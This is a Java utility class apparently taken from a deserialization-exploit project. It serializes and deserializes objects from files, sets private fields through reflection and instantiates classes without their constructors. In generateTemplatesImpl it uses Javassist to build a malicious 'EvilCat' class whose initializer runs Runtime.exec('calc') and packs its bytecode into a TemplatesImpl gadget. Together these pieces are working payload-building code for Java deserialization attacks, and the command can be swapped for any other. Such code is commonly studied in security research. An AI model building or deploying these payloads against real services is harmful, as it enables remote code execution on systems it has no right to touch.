| 15 | import java.lang.reflect.Field; |
| 16 | |
| 17 | public class SerializeUtil { |
| 18 | |
| 19 | public static void writeObjectToFile(Object obj,String fileName) throws Exception { |
| 20 | ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream(fileName)); |
| 21 | outputStream.writeObject(obj); |
| 22 | outputStream.close(); |
| 23 | } |
| 24 | public static void readFileObject(String fileName) throws Exception { |
| 25 | ObjectInputStream ois = new ObjectInputStream(new FileInputStream(fileName)); |
| 26 | Object o = ois.readObject(); |
| 27 | } |
| 28 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { |
| 29 | final Field field = getField(obj.getClass(), fieldName); |
| 30 | field.setAccessible(true); |
| 31 | field.set(obj, value); |
| 32 | } |
| 33 | public static Field getField(final Class<?> clazz, final String fieldName) { |
| 34 | Field field = null; |
| 35 | try { |
| 36 | field = clazz.getDeclaredField(fieldName); |
| 37 | field.setAccessible(true); |
| 38 | } |
| 39 | catch (NoSuchFieldException ex) { |
| 40 | if (clazz.getSuperclass() != null) |
| 41 | field = getField(clazz.getSuperclass(), fieldName); |
| 42 | } |
| 43 | return field; |
| 44 | } |
| 45 | public static TemplatesImpl generateTemplatesImpl() throws Exception { |
| 46 | ClassPool pool = ClassPool.getDefault(); |
| 47 | pool.insertClassPath(new ClassClassPath(AbstractTranslet.class)); |
| 48 | CtClass cc = pool.makeClass("Cat"); |
| 49 | String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");"; |
| 50 | cc.makeClassInitializer().insertBefore(cmd); |
| 51 | String randomClassName = "EvilCat" + System.nanoTime(); |
| 52 | cc.setName(randomClassName); |
| 53 | cc.setSuperclass(pool.get(AbstractTranslet.class.getName())); |
| 54 | byte[] classBytes = cc.toBytecode(); |
| 55 | byte[][] targetByteCodes = new byte[][]{classBytes}; |
| 56 | TemplatesImpl templates = TemplatesImpl.class.newInstance(); |
| 57 | setFieldValue(templates, "_bytecodes", targetByteCodes); |
| 58 | setFieldValue(templates, "_name", "name"); |
| 59 | setFieldValue(templates, "_class", null); |
| 60 | return templates; |
| 61 | } |
| 62 | |
| 63 | public static <T> T createWithoutConstructor ( Class<T> classToInstantiate ) throws Exception { |
| 64 | return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); |
| 65 | } |
| 66 | public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs ) |
| 67 | throws Exception { |
| 68 | Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes); |
| 69 | setAccessible(objCons); |
| 70 | Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); |
| 71 | setAccessible(sc); |
| 72 | return (T)sc.newInstance(consArgs); |
| 73 | } |
| 74 | public static void setAccessible(AccessibleObject member) { |
nothing calls this directly
no outgoing calls
no test coverage detected